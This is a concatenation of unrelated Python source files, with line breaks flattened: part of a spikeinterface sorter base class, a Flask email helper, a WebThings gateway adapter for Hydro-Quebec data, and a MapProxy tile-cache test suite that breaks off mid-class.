dummy location.') channel_ids = recording.get_channel_ids() locations = np.array([[0, i] for i in range(len(channel_ids))]) recording.set_channel_locations(channel_ids, locations) # make folders for output_folder in self.output_folders: if not output_folder.is_dir(): os.makedirs(str(output_folder)) self.delete_folders = delete_output_folder @classmethod def default_params(self): return copy.deepcopy(self._default_params) def set_params(self, **params): bad_params = [] for p in params.keys(): if p not in self._default_params.keys(): bad_params.append(p) if len(bad_params) > 0: raise AttributeError('Bad parameters: ' + str(bad_params)) self.params.update(params) # dump parameters inside the folder with json self._dump_params() def _dump_params(self): for output_folder in self.output_folders: with open(str(output_folder / 'spikeinterface_params.json'), 'w', encoding='utf8') as f: json.dump(_check_json(self.params), f, indent=4) def run(self, raise_error=True): for i, recording in enumerate(self.recording_list): self._setup_recording(recording, self.output_folders[i]) # dump again params because some sorter do a folder reset (tdc) self._dump_params() now = datetime.datetime.now() log = { 'sorter_name' : str(self.sorter_name), 'sorter_version': str(self.get_sorter_version()), 'datetime': now, } t0 = time.perf_counter() if raise_error: if not self.parallel: for i, recording in enumerate(self.recording_list): self._run(recording, self.output_folders[i]) else: # run in threads threads = [] for i, recording in enumerate(self.recording_list): thread = threading.Thread(target=self._run, args=(recording, self.output_folders[i])) threads.append(thread) thread.start() for thread in threads: thread.join() t1 = time.perf_counter() run_time = float(t1-t0) log['error'] = False else: try: if not self.parallel: for i, recording in enumerate(self.recording_list): self._run(recording, self.output_folders[i]) else: # run in threads threads = [] for i, recording in enumerate(self.recording_list): thread = threading.Thread(target=self._run, args=(recording, self.output_folders[i])) threads.append(thread) thread.start() for thread in threads: thread.join() t1 = time.perf_counter() run_time = float(t1-t0) except Exception as err: run_time = None log['error'] = True log['error_trace'] = traceback.format_exc() log['run_time'] = run_time # dump log inside folders for output_folder in self.output_folders: with open(str(output_folder / 'spikeinterface_log.json'), 'w', encoding='utf8') as f: json.dump(_check_json(log), f, indent=4) if self.verbose: if run_time is None: print('Error running', self.sorter_name) else: print('{} run time {:0.2f}s'.format(self.sorter_name, t1 - t0)) return run_time @staticmethod def get_sorter_version(): # need be iplemented in subclass raise NotImplementedError def _setup_recording(self, recording, output_folder): # need be iplemented in subclass # this setup ONE recording (or SubExtractor) # this must copy (or not) the trace in the appropirate format # this must take care of geometry file (ORB, CSV, ...) raise NotImplementedError def _run(self, recording, output_folder): # need be iplemented in subclass # this run the sorter on ONE recording (or SubExtractor) # this must run or generate the command line to run the sorter for one recording raise NotImplementedError @staticmethod def get_result_from_folder(output_folder): raise NotImplementedError def get_result_list(self): sorting_list = [] for i, _ in enumerate(self.recording_list): sorting = self.get_result_from_folder(self.output_folders[i]) sorting_list.append(sorting) return sorting_list def get_result(self): sorting_list = self.get_result_list() if len(sorting_list) == 1: sorting = sorting_list[0] else: for i, sorting in enumerate(sorting_list): property_name = self.recording_list[i].get_channel_property(self.recording_list[i].get_channel_ids()[0], self.grouping_property) if sorting is not None: for unit in sorting.get_unit_ids(): sorting.set_unit_property(unit, self.grouping_property, property_name) # reassemble the sorting outputs sorting_list = [sort for sort in sorting_list if sort is not None] multi_sorting = se.MultiSortingExtractor(sortings=sorting_list) sorting = multi_sorting if self.delete_folders: for out in self.output_folders: if self.verbose: print("Removing ", str(out)) shutil.rmtree(str(out), ignore_errors=True) sorting.set_sampling_frequency(self.recording_list[0].get_sampling_frequency()) return sorting def _check_json(d): # quick hack to ensure json writable for k, v in d.items(): if isinstance(v, Path): d[k] = str(v) elif isinstance(v, (np.int, np.int32, np.int64)): d[k] = int(v) elif isinstance(v, (np.float, np.float32, np.float64)): d[k] = float(v) elif isinstance(v, datetime.datetime): d[k] = v.isoformat() return d
email.py
#!/usr/bin/python # -*- coding: utf-8 -*- from threading import Thread from flask import current_app, render_template from flask.ext.mail import Message from . import mail def send_async_email(app, msg): with app.app_context(): mail.send(msg) def send_email(to, subject, template, **kwargs): app = current_app._get_current_object() msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to]) msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', **kwargs) thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr
hq_adapter.py
"""adapter for webthings gateway""" import functools from gateway_addon import Adapter, Database import time import asyncio from threading import Thread from pkg.hq_device import hq_Device print = functools.partial(print, flush=True)#allow direct print to log of gateway _TIMEOUT = 3 _POLL = 30 class hq_Adapter(Adapter): """ Adapter for the HQ program """ def __init__(self): """Initialize the object""" self.name = self.__class__.__name__ _id = 'webtio-hydroqc-addon' package_name = _id self.config = self.load_db_config(_id)#load config from DB self.verbose = self.config["debug_mode"] super().__init__(_id, package_name, self.verbose) if not self.config: print("Can't load config from Database") return self.pairing=False self.start_pairing(_TIMEOUT) self.async_main() def start_pairing(self, timeout): """Start pairing process""" if self.pairing: return self.pairing = True #create a device for each contract in config for contract in self.config['contracts']: device = hq_Device(self, "hydroqc-{0}".format(contract['name']), contract) self.handle_device_added(device) if self.verbose: print("Start Pairing") time.sleep(timeout) self.pairing = False def cancel_pairing(self): """Cancel the pairing process""" self.pairing = False def load_db_config(self, package_name): """ Load configuration from DB package_name -- name of the package as shown in the manifest.json Return the config object as dict """ database = Database(package_name) if not database.open(): print("Can't open database for package: {0}".format(package_name)) return configs = database.load_config() database.close() return configs def async_main(self): """main async loop""" if self.verbose: print("Starting Loops") t = Thread(target=self.small_loop) t.start() big_loop = asyncio.new_event_loop() t = Thread(target=self.start_loop, args=(big_loop,)) t.start() asyncio.run_coroutine_threadsafe(self.big_loop(), big_loop) """ self.config['sync_frequency'] = 10 asyncio.run(self.big_loop())""" def small_loop(self): """ Looping to update data needed frequently """ while True: if self.verbose: print("Small Loop") if not self.get_devices(): pass for device in self.get_devices(): updatedDevice = self.get_device(device) updatedDevice.update_calculated_property() time.sleep(_POLL) def start_loop(self, loop): """ start an async loop """ asyncio.set_event_loop(loop) loop.run_forever() async def big_loop(self): """ loop to update HQ data, 3 to 4 time a day is enough """ while True: if self.verbose: print("Big Loop") if not self.get_devices(): pass for device in self.get_devices(): device = self.get_device(device) await device.init_session() await device.get_data() device.update_hq_datas() time.sleep(self.config['sync_frequency'])
test_cache.py
# This file is part of the MapProxy project. # Copyright (C) 2010 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import base64 import os import re import shutil import tempfile import threading import time from io import BytesIO from collections import defaultdict import pytest from mapproxy.cache.base import TileLocker from mapproxy.cache.file import FileCache from mapproxy.cache.tile import Tile, TileManager from mapproxy.client.http import HTTPClient from mapproxy.client.wms import WMSClient from mapproxy.compat.image import Image from mapproxy.grid import TileGrid, resolution_range from mapproxy.image import ImageSource from mapproxy.image.opts import ImageOptions from mapproxy.layer import ( BlankImage, CacheMapLayer, DirectMapLayer, MapBBOXError, MapExtent, MapLayer, MapQuery, ResolutionConditional, SRSConditional, ) from mapproxy.request.wms import WMS111MapRequest from mapproxy.source import InvalidSourceQuery, SourceError from mapproxy.source.tile import TiledSource from mapproxy.source.wms import WMSSource from mapproxy.srs import SRS from mapproxy.test.http import assert_query_eq, wms_query_eq, query_eq, mock_httpd from mapproxy.test.image import create_debug_img, is_png, tmp_image from mapproxy.util.coverage import BBOXCoverage TEST_SERVER_ADDRESS = ('127.0.0.1', 56413) GLOBAL_GEOGRAPHIC_EXTENT = MapExtent((-180, -90, 180, 90), SRS(4326)) tmp_lock_dir = None def setup(): global tmp_lock_dir tmp_lock_dir = tempfile.mkdtemp() def teardown(): shutil.rmtree(tmp_lock_dir) class counting_set(object): def __init__(self, items): self.data = defaultdict(int) for item in items: self.data[item] += 1 def add(self, item): self.data[item] += 1 def __repr__(self): return 'counting_set(%r)' % dict(self.data) def __eq__(self, other): return self.data == other.data class MockTileClient(object): def __init__(self): self.requested_tiles = [] def get_tile(self, tile_coord, format=None): self.requested_tiles.append(tile_coord) return ImageSource(create_debug_img((256, 256))) class TestTiledSourceGlobalGeodetic(object): def setup(self): self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) self.client = MockTileClient() self.source = TiledSource(self.grid, self.client) def test_match(self): self.source.get_map(MapQuery([-180, -90, 0, 90], (256, 256), SRS(4326))) self.source.get_map(MapQuery([0, -90, 180, 90], (256, 256), SRS(4326))) assert self.client.requested_tiles == [(0, 0, 1), (1, 0, 1)] def test_wrong_size(self): with pytest.raises(InvalidSourceQuery): self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326))) def test_wrong_srs(self): with pytest.raises(InvalidSourceQuery): self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326))) class MockFileCache(FileCache): def __init__(self, *args, **kw): super(MockFileCache, self).__init__(*args, **kw) self.stored_tiles = set() self.loaded_tiles = counting_set([]) def store_tile(self, tile, dimensions=None): assert tile.coord not in self.stored_tiles self.stored_tiles.add(tile.coord) if self.cache_dir != '/dev/null': FileCache.store_tile(self, tile) def load_tile(self, tile, with_metadata=False, dimensions=None): self.loaded_tiles.add(tile.coord) return FileCache.load_tile(self, tile, with_metadata) def is_cached(self, tile, dimensions=None): return tile.coord in self.stored_tiles def create_cached_tile(tile, cache, timestamp=None): loc = cache.tile_location(tile, create_dir=True) with open(loc, 'wb') as f: f.write(b'foo') if timestamp: os.utime(loc, (timestamp, timestamp)) @pytest.fixture def file_cache(tmpdir): return FileCache(cache_dir=tmpdir.join('cache').strpath, file_ext='png') @pytest.fixture def tile_locker(tmpdir): return TileLocker(tmpdir.join('lock').strpath, 10, "id") @pytest.fixture def mock_tile_client(): return MockTileClient() @pytest.fixture def mock_file_cache(): return MockFileCache('/dev/null', 'png') class TestTileManagerStaleTiles(object): @pytest.fixture def tile_mgr(self, file_cache, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) client = MockTileClient() source = TiledSource(grid, client) tile_mgr = TileManager(grid, file_cache, [source], 'png', locker=tile_locker) return tile_mgr def test_is_stale_missing(self, tile_mgr): assert not tile_mgr.is_stale(Tile((0, 0, 1))) def test_is_stale_not_expired(self, tile_mgr, file_cache): create_cached_tile(Tile((0, 0, 1)), file_cache) assert not tile_mgr.is_stale(Tile((0, 0, 1))) def test_is_stale_expired(self, tile_mgr, file_cache): create_cached_tile(Tile((0, 0, 1)), file_cache, timestamp=time.time()-3600) tile_mgr._expire_timestamp = time.time() assert tile_mgr.is_stale(Tile((0, 0, 1))) class TestTileManagerRemoveTiles(object): @pytest.fixture def tile_mgr(self, file_cache, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) client = MockTileClient() source = TiledSource(grid, client) image_opts = ImageOptions(format='image/png') return TileManager(grid, file_cache, [source], 'png', image_opts=image_opts, locker=tile_locker) def test_remove_missing(self, tile_mgr): tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)]) def test_remove_existing(self, tile_mgr, file_cache): create_cached_tile(Tile((0, 0, 1)), file_cache) assert tile_mgr.is_cached(Tile((0, 0, 1))) tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)]) assert not tile_mgr.is_cached(Tile((0, 0, 1))) class TestTileManagerTiledSource(object): @pytest.fixture def tile_mgr(self, tile_locker, mock_file_cache, mock_tile_client): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = TiledSource(grid, mock_tile_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', image_opts=image_opts, locker=tile_locker, ) def test_create_tiles(self, tile_mgr, mock_file_cache, mock_tile_client): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert sorted(mock_tile_client.requested_tiles) == [(0, 0, 1), (1, 0, 1)] class TestTileManagerDifferentSourceGrid(object): @pytest.fixture def tile_mgr(self, mock_file_cache, mock_tile_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source_grid = TileGrid(SRS(4326), bbox=[0, -90, 180, 90]) source = TiledSource(source_grid, mock_tile_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', image_opts=image_opts, locker=tile_locker, ) def test_create_tiles(self, tile_mgr, mock_file_cache, mock_tile_client): tile_mgr.creator().create_tiles([Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(1, 0, 1)]) assert mock_tile_client.requested_tiles == [(0, 0, 0)] def test_create_tiles_out_of_bounds(self, tile_mgr): with pytest.raises(InvalidSourceQuery): tile_mgr.creator().create_tiles([Tile((0, 0, 0))]) class MockSource(MapLayer): def __init__(self, *args): MapLayer.__init__(self, *args) self.requested = [] def _image(self, size): return create_debug_img(size) def get_map(self, query): self.requested.append((query.bbox, query.size, query.srs)) return ImageSource(self._image(query.size)) @pytest.fixture def mock_source(): return MockSource() class TestTileManagerSource(object): @pytest.fixture def tile_mgr(self, mock_file_cache, mock_source, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [mock_source], 'png', image_opts=image_opts, locker=tile_locker, ) def test_create_tile(self, tile_mgr, mock_file_cache, mock_source): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert sorted(mock_source.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326)), ((0.0, -90.0, 180.0, 90.0), (256, 256), SRS(4326))] class MockWMSClient(object): def __init__(self): self.requested = [] def retrieve(self, query, format): self.requested.append((query.bbox, query.size, query.srs)) return create_debug_img(query.size) @pytest.fixture def mock_wms_client(): return MockWMSClient() class TestTileManagerWMSSource(object): @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, mock_wms_client): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker, ) def test_same_lock_for_meta_tile(self, tile_mgr): assert tile_mgr.lock(Tile((0, 0, 1))).lock_file == \ tile_mgr.lock(Tile((1, 0, 1))).lock_file def test_locks_for_meta_tiles(self, tile_mgr): assert tile_mgr.lock(Tile((0, 0, 2))).lock_file != \ tile_mgr.lock(Tile((2, 0, 2))).lock_file def test_create_tile_first_level(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert mock_wms_client.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] def test_create_tile(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326))] def test_create_tiles(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((0, 0, 2)), Tile((2, 0, 2))]) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)), ((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))] def test_load_tile_coords(self, tile_mgr, mock_file_cache, mock_wms_client): tiles = tile_mgr.load_tile_coords(((0, 0, 2), (2, 0, 2))) assert tiles[0].coord == (0, 0, 2) assert isinstance(tiles[0].source, ImageSource) assert tiles[1].coord == (2, 0, 2) assert isinstance(tiles[1].source, ImageSource) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)), ((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))] class TestTileManagerWMSSourceConcurrent(TestTileManagerWMSSource): @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, mock_wms_client): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker, concurrent_tile_creators=2, ) class TestTileManagerWMSSourceMinimalMetaRequests(object): @pytest.fixture def tile_mgr(self, mock_file_cache, mock_wms_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) return TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=10, minimize_meta_requests=True, locker=tile_locker, ) def test_create_tile_single(self, tile_mgr, mock_file_cache, mock_wms_client): # not enabled for single tile requests tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (0, 1, 2), (1, 0, 2), (1, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 3.515625, 90.0), (522, 512), SRS(4326))] def test_create_tile_multiple(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((4, 1, 3)), Tile((4, 2, 3))]) assert mock_file_cache.stored_tiles == \ set([(4, 0, 3), (4, 1, 3), (4, 2, 3)]) assert sorted(mock_wms_client.requested) == \ [((-1.7578125, -90, 46.7578125, 46.7578125), (276, 778), SRS(4326))] def test_create_tile_multiple_fragmented(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((5, 2, 3))]) assert mock_file_cache.stored_tiles == \ set([(4, 0, 3), (4, 1, 3), (4, 2, 3), (5, 0, 3), (5, 1, 3), (5, 2, 3)]) assert sorted(mock_wms_client.requested) == \ [((-1.7578125, -90, 91.7578125, 46.7578125), (532, 778), SRS(4326))] class SlowMockSource(MockSource): supports_meta_tiles = True def get_map(self, query): time.sleep(0.1) return MockSource.get_map(self, query) class TestTileManagerLocking(object): @pytest.fixture def slow_source(self): return SlowMockSource() @pytest.fixture def mock_file_cache(self, tmpdir): return MockFileCache(tmpdir.strpath, 'png') @pytest.fixture def tile_mgr(self, mock_file_cache, slow_source, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [slow_source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker, ) def test_get_single(self, tile_mgr, mock_file_cache, slow_source): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert slow_source.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] def test_concurrent(self, tile_mgr, mock_file_cache, slow_source): def do_it(): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) threads = [threading.Thread(target=do_it) for _ in range(3)] [t.start() for t in threads] [t.join() for t in threads] assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert mock_file_cache.loaded_tiles == counting_set([(0, 0, 1), (1, 0, 1), (0, 0, 1), (1, 0, 1)]) assert slow_source.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] assert os.path.exists(mock_file_cache.tile_location(Tile((0, 0, 1)))) class TestTileManagerMultipleSources(object): @pytest.fixture def source_base(self): return MockSource() @pytest.fixture def source_overlay(self): return MockSource() @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, source_base, source_overlay): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', image_opts=image_opts, locker=tile_locker, ) def test_get_single(self, tile_mgr, mock_file_cache, source_base, source_overlay): tile_mgr.creator().create_tiles([Tile((0, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1)]) assert source_base.requested == \ [((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))] assert source_overlay.requested == \ [((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))] class SolidColorMockSource(MockSource): def __init__(self, color='#ff0000'): MockSource.__init__(self) self.color = color def _image(self, size): return Image.new('RGB', size, self.color) class TestTileManagerMultipleSourcesWithMetaTiles(object): @pytest.fixture def source_base(self): src = SolidColorMockSource(color='#ff0000') src.supports_meta_tiles = True return src @pytest.fixture def source_overlay(self): src = MockSource() src.supports_meta_tiles = True return src @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, source_base, source_overlay): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', image_opts=image_opts, meta_size=[2, 2], meta_buffer=0, locker=tile_locker, ) def test_merged_tiles(self, tile_mgr, mock_file_cache, source_base, source_overlay): tiles = tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert source_base.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] assert source_overlay.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] hist = tiles[0].source.as_image().histogram() # lots of red (base), but not everything (overlay) assert 55000 < hist[255] < 60000 # red = 0xff assert 55000 < hist[256] # green = 0x00 assert 55000 < hist[512] # blue = 0x00 def test_sources_with_mixed_support_for_meta_tiles(self, mock_file_cache, source_base, source_overlay, tile_locker): source_base.supports_meta_tiles = False grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) with pytest.raises(ValueError): TileManager(grid, file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker) def test_sources_with_no_support_for_meta_tiles(self, mock_file_cache, source_base, source_overlay, tile_locker): source_base.supports_meta_tiles = False source_overlay.supports_meta_tiles = False grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) tile_mgr = TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker) assert tile_mgr.meta_grid is None class TestTileManagerBulkMetaTiles(object): @pytest.fixture def source_base(self): src = SolidColorMockSource(color='#ff0000') src.supports_meta_tiles = False return src @pytest.fixture def source_overlay(self): src = MockSource() src.supports_meta_tiles = False return src @pytest.fixture def tile_mgr(self, mock_file_cache, source_base, source_overlay, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90], origin='ul') return TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker, bulk_meta_tiles=True, ) def test_bulk_get(self, tile_mgr, mock_file_cache, source_base, source_overlay): tiles = tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) assert len(tiles) == 2*2 assert mock_file_cache.stored_tiles == set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2)]) for requested in [source_base.requested, source_overlay.requested]: assert set(requested) == set([ ((-180.0, 0.0, -90.0, 90.0), (256, 256), SRS(4326)), ((-90.0, 0.0, 0.0, 90.0), (256, 256), SRS(4326)), ((-180.0, -90.0, -90.0, 0.0), (256, 256), SRS(4326)), ((-90.0, -90.0, 0.0, 0.0), (256, 256), SRS(4326)), ]) def test_bulk_get_error(self, tile_mgr, source_base): tile_mgr.sources = [source_base, ErrorSource()] try: tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) except Exception as ex: assert ex.args[0] == "source error" def test_bulk_get_multiple_meta_tiles(self, tile_mgr, mock_file_cache): tiles = tile_mgr.creator().create_tiles([Tile((1, 0, 2)), Tile((2, 0, 2))]) assert len(tiles) == 2*2*2 assert mock_file_cache.stored_tiles, set([ (0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2), ]) class TestTileManagerBulkMetaTilesConcurrent(TestTileManagerBulkMetaTiles): @pytest.fixture def tile_mgr(self, mock_file_cache, source_base, source_overlay, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90], origin='ul') return TileManager( grid, mock_file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker, bulk_meta_tiles=True, concurrent_tile_creators=2, ) class ErrorSource(MapLayer): def __init__(self, *args): MapLayer.__init__(self, *args) self.requested = [] def get_map(self, query): self.requested.append((query.bbox, query.size, query.srs)) raise Exception("source error") default_image_opts = ImageOptions(resampling='bicubic') class TestCacheMapLayer(object): @pytest.fixture def layer(self, mock_file_cache, mock_wms_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) image_opts = ImageOptions(resampling='nearest') tile_mgr = TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker) return CacheMapLayer(tile_mgr, image_opts=default_image_opts) def test_get_map_small(self, layer, mock_file_cache): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert result.size == (300, 150) def test_get_map_large(self, layer, mock_file_cache): # gets next resolution layer result = layer.get_map(MapQuery((-180, -90, 180, 90), (600, 300), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert result.size == (600, 300) def test_transformed(self, layer, mock_file_cache): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert result.size == (500, 500) def test_single_tile_match(self, layer, mock_file_cache): result = layer.get_map(MapQuery( (0.001, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True)) assert mock_file_cache.stored_tiles == \ set([(3, 0, 2), (2, 0, 2), (3, 1, 2), (2, 1, 2)]) assert result.size == (256, 256) def test_single_tile_no_match(self, layer): with pytest.raises(MapBBOXError): layer.get_map( MapQuery((0.1, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True) ) def test_get_map_with_res_range(self, mock_file_cache, mock_wms_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) res_range = resolution_range(1000, 10) source = WMSSource(mock_wms_client, res_range=res_range) image_opts = ImageOptions(resampling='nearest') tile_mgr = TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker) layer = CacheMapLayer(tile_mgr, image_opts=default_image_opts) with pytest.raises(BlankImage): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_file_cache.stored_tiles == set() result = layer.get_map(MapQuery( (0, 0, 10000, 10000), (50, 50), SRS(900913), 'png')) assert mock_file_cache.stored_tiles == \ set([(512, 257, 10), (513, 256, 10), (512, 256, 10), (513, 257, 10)]) assert result.size == (50, 50) class TestCacheMapLayerWithExtent(object): @pytest.fixture def source(self, mock_wms_client): return WMSSource(mock_wms_client) @pytest.fixture def layer(self, mock_file_cache, source, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(resampling='nearest', format='png') tile_mgr = TileManager(grid, mock_file_cache, [source], 'png', meta_size=[1, 1], meta_buffer=0, image_opts=image_opts, locker=tile_locker) layer = CacheMapLayer(tile_mgr, image_opts=default_image_opts) layer.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent return layer def test_get_outside_extent(self, layer): with pytest.raises(BlankImage): layer.get_map(MapQuery((-180, -90, 0, 0), (300, 150), SRS(4326), 'png')) def test_get_map_small(self, layer, mock_file_cache, mock_wms_client): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == set([(1, 0, 1)]) # source requests one tile (no meta-tiling configured) assert mock_wms_client.requested == [((0.0, -90.0, 180.0, 90.0), (256, 256), SRS('EPSG:4326'))] assert result.size == (300, 150) def test_get_map_small_with_source_extent(self, source, layer, mock_file_cache, mock_wms_client): source.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == set([(1, 0, 1)]) # source requests one tile (no meta-tiling configured) limited to source.extent assert mock_wms_client.requested == [((0, 0, 90, 45), (128, 64), (SRS(4326)))] assert result.size == (300, 150) class TestDirectMapLayer(object): 